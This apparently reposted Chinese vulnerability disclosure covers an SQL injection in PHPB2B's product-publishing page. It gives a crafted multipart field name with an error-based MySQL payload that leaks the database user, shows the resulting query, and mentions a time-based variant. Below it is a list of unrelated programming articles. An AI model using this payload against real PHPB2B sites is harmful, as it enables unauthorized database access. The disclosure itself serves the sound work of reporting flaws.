php3绕过,PHPB2B注入#3(绕过过滤)

PHPB2B某处注入

绕过过滤。

官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip

详细说明:

1.注册企业会员。

2.注册企业会员且通过审核。

发布产品。

漏洞文件。virtual-office/product.php

Content-Disposition: form-data; name="data[product][sort_id]"

Content-Disposition: form-data; name="data[product][name]"

...

...

post提交:Content-Disposition: form-data; name="data[product][sort_id FROM pb_thk_products where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#]"

执行:

SELECT sort_id FROM pb_thk_products where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#,name,price,country_id,content,type_id,category_id,brand_id,status,tag_ids,cache_companyname,industry_id,area_id,member_id,company_id,modified,created FROM pb_thk_products WHERE id='-1'

漏洞证明:

本地测试开启debug。程序默认不开启debug,可延时注入。

d5ef66ff0e1a2755783e7bf1ed341c73.png

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/500616.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

java五子棋实训训心得,java五子棋实习报告

java五子棋实训训心得,java五子棋实习报告

java五子棋实习报告 Java 程序设计基础 实习报告 课程名称 Java 程序设计基础 实习题目 java 五子棋 专 业 班 级 学 号 学生姓名 指导教师 Java 实习报告 一、一、J JAVAAVA 技术介绍技术介绍 Java 技术是一门编程语言,也是一个平台,它基于 Java 虚拟机…
阅读更多...
java如何实现开机启动,怎样实现开机启动holer

java如何实现开机启动,怎样实现开机启动holer

Holer客户端软件设置开机启动Holer client 1.2版本支持设置开机自启动。Holer Java语言版本解压软件包,进入目录:cd holer-client/binWindows系统:双击 setup.vbs注意事项:请确保当前用户对如下目录具有读取、写入、执行、修改等权…
阅读更多...
《我和他的结婚录像和相册集》的快速传播

《我和他的结婚录像和相册集》的快速传播

当你看到你的一个朋友的 Live Space 有了这个更新,你当然想看. 但是你是点击文字 “我和他的结婚录像和相册集”, 还是旁边的 "心形图标"? 很多人,包括我,都点击了"心形图标", 不幸的是,这样…
阅读更多...
一篇热帖的解剖

一篇热帖的解剖

上回提到《结婚相册》的快速流传, 其实,不但是结婚相册, 有时候网络上出现一篇似是而非,似非而是的热帖,大家就纷纷转贴, 大家的朋友看了之后也热气上冲,继续转贴。。。 这篇博客 (http://blo…
阅读更多...
php分区表,【MYSQL】分区表

php分区表,【MYSQL】分区表

对于MYSQL的态度一直都是会基本SQL和简单命令就行,最近处理一个数据量很大的项目,为了提高效率,在数据库方面的瓶颈上,选择了使用分区表来提高查询效率。至此和大家一起分享一下。 1.引言 本文初略的讲述了mysql数据库如何分区表。…
阅读更多...
顶级程序员的心得 Coders at Work (I)

顶级程序员的心得 Coders at Work (I)

正在读 “Coders at Work”, 对15 位顶级程序员的采访, 总共600页。 从采访的模式看,有点像“艺术人生”, 一般都是音乐起,讲小时候的故事,你怎么开始写程序的? (Brad 同学 5 岁开始写) ; 不过后来并没…
阅读更多...
顶级程序员的心得 Coders at Work (II)

顶级程序员的心得 Coders at Work (II)

正在读 “Coders at Work”, 对15 位顶级程序员的采访, 总共600页。 这些看似冗长的问答中有不少精辟的言论。 我摘录了一些关于挑选,面试程序员,优秀程序员的特点,和程序设计的句子。下面是 3 个程序员的心得,和我的…
阅读更多...
顶级程序员的心得 Coders at Work (III)

顶级程序员的心得 Coders at Work (III)

这是第三部分&#xff08;第一&#xff0c;第二部分&#xff09;&#xff0c;非常有意思的问答&#xff0c;值得仔细琢磨。 这里只是一些和程序员发展&#xff0c;面试&#xff0c;优秀程序员的特点等相关的部分。 有些想法和 MSF 中的原则也很相似 &#xff08;见 <移山之…
阅读更多...
html留言板 php,linux下使用Apache+php实现留言板功能的网站

html留言板 php,linux下使用Apache+php实现留言板功能的网站

一.首先我们的linux服务器上要安装Apache和phpphp的安装方法和Apache方法如同一辙二.关闭防火墙服务&#xff0c;关闭selinux请参考&#xff1a;http://www.cnblogs.com/dagege/p/5947251.html三.我们通过FTP服务或使用rz命令将文件放到Apache的根目录下 /var/www/html示例文件…
阅读更多...
顶级程序员的心得 Coders at Work (IV)

顶级程序员的心得 Coders at Work (IV)

( 第一&#xff0c;第二&#xff0c; 第三部分 ) “Coders at Work”, 对15 位顶级程序员的采访&#xff0c; 总共600页。 看似冗长的问答中有不少精辟的言论。 我摘录了一些关于挑选&#xff0c;面试程序员&#xff0c;优秀程序员的特点&#xff0c;和程序设计的句子。下面…
阅读更多...
编程之美 - 哪个题目最美?

编程之美 - 哪个题目最美?

编辑部搞的活动&#xff0c; 请大家帮个忙&#xff0c;来投票吧&#xff0c;看看《编程之美》第1章“游戏之乐——游戏中碰到的题目”大家最喜欢哪个题目&#xff0c;或者大家认为哪个题目最有趣。         可以选择以下任何网址参与投票&#xff1a;   CSDN&#xff1…
阅读更多...
ssl在线申请php源码,简易实现HTTPS之自动实现ssl

ssl在线申请php源码,简易实现HTTPS之自动实现ssl

众所周知 HTTP 协议是一种不安全的协议&#xff0c; 而 HTTPS 协议是 HTTP over SSL/TLS 的缩写&#xff0c;表示“使用 SSL/TLS 的 HTTP &#xff0c;也就是通常所说的“超文本传输安全协议”。 HTTP 搭配 SSL/TLS 协议可以搭建加密传输、身份认证的网络协议。没有升级到 HTTP…
阅读更多...
php怎么上传函数,php上传函数怎么封装

php怎么上传函数,php上传函数怎么封装

php上传函数怎么封装&#xff1f;<?php //上传文件调用 $file $_FILES[image]; //允许上传的类型 $allow array(image/jpeg, image/png, image/jpg, image/gif); $path ./uploads; $maxsize 1024 * 1024 * 3; $result upload($file, $allow, $error, $path, $maxsize)…
阅读更多...
php-frm进程管理,PHP内核探索-进程管理

php-frm进程管理,PHP内核探索-进程管理

进程管理方式首先我们了解一下php的三种不同的进程管理方式&#xff1a;static&#xff1a;静态管理进程。在启动时&#xff0c;master按照pm.max_children配置fork出对应数量的work进程&#xff0c;即work的进程是固定不变的。dynamic&#xff1a;动态管理进程。在fpm启动时先…
阅读更多...
THU – team players 合作精神

THU – team players 合作精神

我朝的教育体系虽然时不时灌输“互相帮助”的精神&#xff0c;但是所有小考&#xff0c;中考&#xff0c;大考&#xff0c;无一不是考察个人独立作战。你要互相帮助&#xff0c;不但违反考场纪律&#xff0c;而且其他同学的好成绩对你是一个直接的威胁。 在这种价值体系下产出的…
阅读更多...
我写的博客居然是百度搜索第一名 - 感谢国家 …

我写的博客居然是百度搜索第一名 - 感谢国家 …

http://www.baidu.com/s?bs%BD%E1%BB%E9%C2%BC%CF%F1%BA%CD%CF%E0%B2%E1%BC%AF&f8&wd%CE%D2%BA%CD%CB%FB%B5%C4%BD%E1%BB%E9%C2%BC%CF%F1%BA%CD%CF%E0%B2%E1%BC%AF 而且这个“结婚录像和相册集”还在传播中&#xff0c; 刚刚看到 Tao Mei 同学也在他的space 中加上了。…
阅读更多...
CSDN 首页的第一屏 广告/新闻 比率 = 40 : 2

CSDN 首页的第一屏 广告/新闻 比率 = 40 : 2

有一天我不小心开了 www.csdn.net, 定睛端详许久&#xff0c; 我只看到 2 条新闻 (连线杂志 和 金山震荡) 。 其他的除了两行导航条&#xff0c;都是广告 &#xff08;导航条下面的那一行看似第三条导航条&#xff0c;其实也是广告&#xff09;。 其中右下角的窗口上有六个广…
阅读更多...
php 跳板机连接mysql,使用python如何通过跳板机连接MySQL数据库

php 跳板机连接mysql,使用python如何通过跳板机连接MySQL数据库

生产环境中&#xff0c;为了安全起见&#xff0c;大多数的数据库是无法在本地直接访问的&#xff0c;需要先连接跳板机&#xff0c;然后通过跳板机访问。创业天下测试数据库也是采用这种方法连接数据的&#xff0c;那么我们应该怎么通过Python去连接数据库呢&#xff0c;代码如…
阅读更多...
去 QCon 学习

去 QCon 学习

他山之石&#xff0c;可以攻玉。就看你的项目有多少“玉”的成分&#xff0c;究竟敢不敢用“石”来攻。 QCon Beijing 2010 | 全球企业开发大会&#xff08;北京站&#xff09; 大会&#xff1a;4 月23 日~4 月25 日&#xff1b;培训&#xff1a;4 月21 日~4 月22 日 大会地点…
阅读更多...
Requirements of pair programming

Requirements of pair programming

题目&#xff1a;围棋棋谱的特征搜索说明&#xff1a;将用户的棋盘输入作为特征&#xff0c;在棋谱包中读取SGF棋谱&#xff0c;找出特征相符的棋谱。注&#xff1a;不仅要考虑棋子的位置&#xff0c;还要考虑走棋的顺序。对找出的棋谱按照符合程度排序。实现为桌面程序&#x…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023